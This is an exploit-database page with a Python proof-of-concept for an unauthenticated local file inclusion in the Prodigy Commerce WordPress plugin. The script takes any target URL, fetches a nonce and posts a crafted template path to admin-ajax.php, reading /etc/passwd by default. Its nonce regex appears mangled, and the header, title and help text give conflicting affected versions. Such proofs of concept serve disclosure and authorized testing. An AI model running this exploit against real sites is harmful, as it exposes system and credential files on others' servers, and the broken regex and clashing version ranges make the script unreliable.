
Prodigy Commerce 3.3.0 – Local File Inclusion

Categories: WebApps

Prodigy Commerce 3.3.0 – Local File Inclusion

Proof of Concept (PoC)

poc.py
# Exploit Title: Prodigy Commerce  3.3.0 - Local File Inclusion 
# Date: 23-05-2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://prodigycommerce.com/
# Software Link: https://wordpress.org/plugins/prodigy-commerce/
# Version: 3.2.9
# Tested on: Debian
# CVE : CVE-2026-0926
# Description: Prodigy Commerce WordPress plugin <= 3.2.9 contains a local file inclusion caused by improper sanitization of 'parameters[template_name]' parameter, letting unauthenticated attackers include and execute arbitrary files remotely.


import httpx
import asyncio
import re
from urllib.parse import urljoin
import argparse


def get_nonce(base_url):
    """Fetch ``base_url`` and extract the plugin's AJAX nonce from the page body.

    Returns the nonce string when the regex matches. When it does not, the
    function prints "Nonce not found" and falls off the end, so the caller
    receives ``None`` implicitly and must cope with that.
    """
    # TLS certificate verification is disabled for this client session.
    with httpx.Client(verify=False) as client:
        r = client.get(url=base_url)
        # Looks for an inline JavaScript `settings` object that carries a
        # "nonce" key. NOTE(review): as printed, the pattern contains literal
        # 's' characters rather than whitespace escapes — it looks mangled in
        # transcription, so whether it matches real markup is unverified.
        match = re.search(r'var settingss*=s*{[^}]*"nonce":"([^"]+)"', r.text)
        if match:
            nonce = match.group(1)
            return nonce
        else:
            print("Nonce not found")

async def main(base_url,file):
    """Send the crafted ``admin-ajax.php`` request and print the returned HTML.

    ``base_url`` is the target site root; ``file`` is the value placed in
    ``parameters[template_name]``. The response is expected to be JSON with a
    ``data`` object containing an ``html`` key; any other shape raises
    ``KeyError`` (or ``ValueError``/``JSONDecodeError`` if it is not JSON),
    as there is no status-code or error handling here.
    """
    # TLS certificate verification is disabled for this client session.
    async with httpx.AsyncClient(verify=False) as client:
        # get_nonce() is synchronous: it blocks the event loop for the
        # duration of its own HTTP round-trip. It may return None (see its
        # docstring), in which case None is passed straight into the form.
        nonce = get_nonce(base_url)
        data = {
            "action": "prodigy-render-my-account-widget",
            "nonce": nonce,
            "parameters[template_name]": file,
            "parameters[default_path]": "/"
        }

        # Absolute path, so any path component in base_url is replaced.
        url = urljoin(base_url, '/wp-admin/admin-ajax.php')
        r = await client.post(url=url, data=data)
        raw = r.json()
        out = raw['data']
        print(out['html'])

# Script entry point: parse CLI options and run the async routine once.
# Note the version range in this description ("<= 3.3.0") differs from the
# header comment's "<= 3.2.9"; the page does not say which is authoritative.
parser = argparse.ArgumentParser(description="Prodigy Commerce <= 3.3.0 - Local File Inclusion exploit")
parser.add_argument("-f", "--file", default='/etc/passwd', help="File to read, default: /etc/passwd")
parser.add_argument("-u", "--url", required=True, help="Target url, e.g. http://test.local")
args = parser.parse_args()

# Runs at import time as well — there is no `if __name__ == "__main__"` guard.
asyncio.run(main(args.url, args.file))

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.
